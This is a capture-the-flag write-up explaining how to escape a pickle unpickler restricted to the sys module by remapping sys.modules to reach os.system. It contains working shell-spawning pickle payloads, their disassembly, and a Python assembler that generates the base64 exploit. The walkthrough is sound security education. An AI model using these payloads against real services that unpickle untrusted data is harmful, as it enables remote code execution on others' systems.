# Pyshv1 : high security pickles.

## The challenge

The server expects a base64-encoded pickle object. The one twist: you are limited in what
you can put in the pickle. The only module you can use in the pickle is `sys`.

This means the typical pickle shellcode won't work :
```
cos
system
(S'/bin/sh'
tR.
```
It uses `os`, so this is not gonna work. We'll have to build our own damned shellcode.
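The server code isn't reproduced in this writeup, so take the following as a rough sketch only: a filter like this is commonly built by overriding `Unpickler.find_class`. The names `SysOnlyUnpickler` and `restricted_loads` are made up for illustration, and the real challenge may check things differently.

```python
import io
import pickle
import sys


class SysOnlyUnpickler(pickle.Unpickler):
    """Hypothetical filter: only names at the root of `sys` may be loaded."""

    def find_class(self, module, name):
        if module != "sys" or "." in name:
            raise pickle.UnpicklingError(f"forbidden global: {module}.{name}")
        return super().find_class(module, name)


def restricted_loads(data):
    """Unpickle `data` through the sys-only filter."""
    return SysOnlyUnpickler(io.BytesIO(data)).load()


# A global taken from `sys` is accepted...
accepted = restricted_loads(b"csys\nmaxsize\n.")
print(accepted == sys.maxsize)

# ...but the classic os.system payload is rejected in find_class,
# before the REDUCE opcode ever gets a chance to call anything.
try:
    restricted_loads(b"cos\nsystem\n(S'/bin/sh'\ntR.")
except pickle.UnpicklingError as exc:
    print("rejected:", exc)
```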

## What pickle allows.

The pickle format(s) is a stack based language made to store python objects. With it, you can :

* create tuples, lists, dicts
* append values to lists (tuples are built in one go)
* add or update values in dict
* access functions and values at the root of modules
* call whatever you manage to put on the stack.

With the limitation of the challenge, getting anything but the functions and values at the root of `sys` onto the stack is non-trivial.
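To make those primitives concrete, here are a few hand-written protocol 0 pickles, one per capability. This is just an illustration using the plain, unrestricted `pickle.loads`; the variable names are mine.

```python
import pickle
import sys

# MARK + DICT builds {}; then push a key and a value, SETITEM stores them.
as_dict = pickle.loads(b"(dS'a'\nI1\ns.")

# MARK + LIST builds []; APPEND adds the value sitting on top of the stack.
as_list = pickle.loads(b"(lI1\naI2\na.")

# MARK, two ints, then TUPLE collects everything above the mark.
as_tuple = pickle.loads(b"(I1\nI2\nt.")

# GLOBAL pushes an attribute found at the root of a module.
maxsize = pickle.loads(b"csys\nmaxsize\n.")

# GLOBAL + empty tuple + REDUCE calls the function with no arguments.
limit = pickle.loads(b"csys\ngetrecursionlimit\n(tR.")

print(as_dict)    # {'a': 1}
print(as_list)    # [1, 2]
print(as_tuple)   # (1, 2)
print(maxsize == sys.maxsize, limit == sys.getrecursionlimit())
```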

## Python system module.

There are a lot of things in the `sys` module. I spent some time investigating the `sys.breakpointhook()` function, as it pops the debugger. However, it wouldn't work on the server.

While the `sys` module has `sys.stdout`, it can't be used to print, as only objects and functions at the root of the module can be accessed or called. You can read `sys.argv`, or call `sys.exit()`, but `sys.stdout.write()` is off limits. Printing can be done via `sys.displayhook`.
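As a small illustration of the printing trick, this pickle calls `sys.displayhook` on a string. It assumes the default display hook is installed (an interactive shell such as IPython replaces it), and the captured-output plumbing is only there to show what gets written.

```python
import contextlib
import io
import pickle

# GLOBAL sys.displayhook, then call it with one string argument.
payload = b"csys\ndisplayhook\n(S'hello from pickle'\ntR."

buf = io.StringIO()
with contextlib.redirect_stdout(buf):
    result = pickle.loads(payload)  # displayhook returns None

printed = buf.getvalue()
print(printed, end="")  # the default hook writes the repr of the value
```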

A key element of the `sys` module is the `sys.modules` dictionary. It contains references to all loaded modules, and playing with it has a lot of impact.
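A quick way to see how much weight `sys.modules` carries: whatever object sits under a name in that dict is what `import` hands back, module or not. The name `fake_mod` below is invented for the demo.

```python
import sys

# Register an arbitrary object under a made-up module name.
sys.modules["fake_mod"] = {"answer": 42}

# No file is searched: the cached entry is returned as-is.
import fake_mod

print(type(fake_mod))          # <class 'dict'>
print(fake_mod.get("answer"))  # 42

del sys.modules["fake_mod"]    # clean up after the demo
```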

## Solving this

The aim is to reach `os.system` to spawn a shell.
To solve this, we're gonna change the value of `sys.modules['sys']` to change what `sys` represents.

It's a three-step process, best described by the following Python code.

```python
import sys
import os

modules = sys.modules # save sys.modules for later
sys.modules['sys'] = sys.modules # remap sys to sys.modules
import sys
modules['sys'] = sys.get('os') # access os through the remapped sys, and store it in sys.modules['sys']
import sys
sys.system('echo "it works!"') # boom!
```

This is great and all, but translating that to pickle code will require a deep understanding of the pickle language and opcodes.
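Part of that understanding is how the `c` (GLOBAL) opcode resolves names. As far as I can tell, for protocols below 4 CPython's default `find_class` roughly imports the module name and then reads the attribute off the `sys.modules` entry. The sketch below mimics that with a made-up helper, `resolve_global`, and undoes the remapping at the end so it is safe to run.

```python
import os
import sys

real_sys = sys
modules = sys.modules  # keep a direct reference to the dict


def resolve_global(module, name):
    """Simplified stand-in for GLOBAL name resolution (protocol < 4)."""
    __import__(module)
    return getattr(modules[module], name)


try:
    modules["sys"] = modules                  # `sys` now names the dict
    dict_get = resolve_global("sys", "get")   # so "csys\nget\n" yields dict.get
    os_module = dict_get("os")
    modules["sys"] = os_module                # `sys` now names the os module
    system = resolve_global("sys", "system")  # so "csys\nsystem\n" yields os.system
finally:
    modules["sys"] = real_sys                 # undo the remapping

print(os_module is os, system is os.system)
```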

## The Solution

Writing the solution by hand is a nasty business. The shellcode looks like this:

```
csys
displayhook
p0
0csys
modules
p1
0g1
S'sys'
g1
scsys
get
p2
0g2
(S'os'
tRp3
0g1
S'sys'
g3
s0csys
system
(S'/bin/sh'
tR0.
```

Disassembled with the excellent `pickletools` module (it's in the standard lib!), it's a bit better looking:
```
0: c GLOBAL 'sys displayhook'
17: p PUT 0
20: 0 POP
21: c GLOBAL 'sys modules'
34: p PUT 1
37: 0 POP
38: g GET 1
41: S STRING 'sys'
48: g GET 1
51: s SETITEM
52: c GLOBAL 'sys get'
61: p PUT 2
64: 0 POP
65: g GET 2
68: ( MARK
69: S STRING 'os'
75: t TUPLE (MARK at 68)
76: R REDUCE
77: p PUT 3
80: 0 POP
81: g GET 1
84: S STRING 'sys'
91: g GET 3
94: s SETITEM
95: 0 POP
96: c GLOBAL 'sys system'
108: ( MARK
109: S STRING '/bin/sh'
120: t TUPLE (MARK at 108)
121: R REDUCE
122: 0 POP
123: . STOP
highest protocol among opcodes = 0
```
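For reference, a listing like this comes from `pickletools.dis`. Here is a minimal example on just a fragment of the payload (fetch `sys.modules`, memoize it, load it back); the `fragment` and `listing` names are mine.

```python
import io
import pickletools

# GLOBAL sys.modules, PUT 1, POP, GET 1, STOP
fragment = b"csys\nmodules\np1\n0g1\n."

out = io.StringIO()
pickletools.dis(fragment, out=out)  # dis() also sanity-checks stack and memo use
listing = out.getvalue()
print(listing)
```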

But this is still not great, and anyway there's no assembler available in the pickletools module.

I wrote a small assembler, implementing just the opcodes that were needed for this series of challenges.

Here it is :

```python
#!/usr/bin/env python3

from pickle import * # this imports the constants for all the pickle opcodes
from pickletools import dis # thank god for the pickletools module

from base64 import b64encode

def main():
    p = BadPickler(protocol=0)

    # ==== Shellcode =====================================
    l = [
        # access `sys.modules`, and save it on the memo
        p.store_global('sys', 'modules', 'modules'),

        # grab `sys.modules` from the memo, put it on the stack
        p.load('modules'),

        # sys.modules['sys'] = sys.modules
        p.update_key(p.string('sys'),
                     p.load('modules')),

        # at this point, `sys` is no longer pointing to the `sys` module.
        # It is now a reference to the original `sys.modules`
        # this means we can call any dict method on `sys`, to grab values of keys
        # in the original sys.module.

        #grab a reference to the real `sys.modules.get`
        p.store_global('sys', 'get', 'dict_get'),

        # call the real `sys.modules.get('os')` to get a reference to
        # the os module
        p.call(p.load('dict_get'),
               p.string('os')),

        # store the os module
        p.store('os_module'),
        POP,

        # load `sys.modules`
        p.load('modules'),

        # set `sys.modules['sys'] = <module 'os' from '/usr/lib/python3.7/os.py'>
        p.update_key(p.string('sys'),
                     p.load('os_module')),
        POP,

        # at this point, `sys` is now a reference to the `os` module.
        # we can access the `os.system` function, popping a shell
        p.call(p.get_global('sys', 'system'),
               p.string('/bin/sh')),
        POP,
        STOP
    ]
    p.write_list(l)
    bad_pickle = p.get_pickle()

    dis(bad_pickle)
    print(b64encode(bad_pickle))

class BadPickler():
    memo_mapping = {}
    memo_idx = 0
    def __init__(self, protocol):
        self.pickle_buff = bytearray()
        self.protocol = protocol

    def write(self, x):
        self.pickle_buff += x

    def write_list (self, list_x):
        for x in list_x:
            self.pickle_buff += x

    def build(self, *opcodes):
        return b''.join(opcodes)

    def get_pickle(self):
        return(self.pickle_buff)

    # ----------------------------------------------

    def get_global(self, mod, cls):
        b_mod = mod.encode('ascii')
        b_cls = cls.encode('ascii')
        return self.build(GLOBAL, b_mod, b'\n', b_cls, b'\n')

    def call(self, fn, args):
        return self.build(fn,
                          MARK,
                          self.build(args),
                          TUPLE,
                          REDUCE)

    def store(self, name):
        byte_memo_idx = str(self.memo_idx).encode('ascii')
        self.memo_mapping[name] = byte_memo_idx
        val = self.build(PUT, byte_memo_idx, b'\n')
        self.memo_idx += 1
        return val

    def store_global(self, mod, cls, name):
        return self.build(self.get_global(mod,cls),
                          self.store(name),
                          POP)

    def load(self, name):
        idx = self.memo_mapping[name]
        return self.build(GET, idx, b'\n')

    def string(self, x):
        return self.build(b"S'", x.encode('ascii'), b"'", b'\n')

    def update_key(self, key, val):
        return self.build(key,
                          val,
                          SETITEM)

if __name__ == '__main__':
    main()
```
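To sanity-check a payload locally before sending it, one option is to run it in a throwaway child interpreter, since the payload leaves `sys.modules['sys']` pointing at `os`. The sketch below is an assumption-heavy test rig, not the challenge server: `SysOnlyUnpickler` is a made-up stand-in for the server's filter, and the payload is the byte string the assembler above should produce as far as I can trace it by hand, with a harmless `echo` swapped in for `/bin/sh`.

```python
import subprocess
import sys
import textwrap

# Script run in the child process (raw string: the \n escapes are
# interpreted by the child, inside its bytes literals).
CHILD = textwrap.dedent(r'''
    import io, pickle

    class SysOnlyUnpickler(pickle.Unpickler):
        # hypothetical stand-in for the server-side filter
        def find_class(self, module, name):
            if module != "sys" or "." in name:
                raise pickle.UnpicklingError("forbidden")
            return super().find_class(module, name)

    payload = (b"csys\nmodules\np0\n0g0\nS'sys'\ng0\ns"
               b"csys\nget\np1\n0g1\n(S'os'\ntRp2\n0"
               b"g0\nS'sys'\ng2\ns0"
               b"csys\nsystem\n(S'echo it works'\ntR0.")
    SysOnlyUnpickler(io.BytesIO(payload)).load()
''')

result = subprocess.run([sys.executable, "-c", CHILD],
                        capture_output=True, text=True, timeout=30)
print(result.stdout)
```

If the remapping went through, the child's output should contain the echoed text; the parent interpreter's own `sys` is never touched.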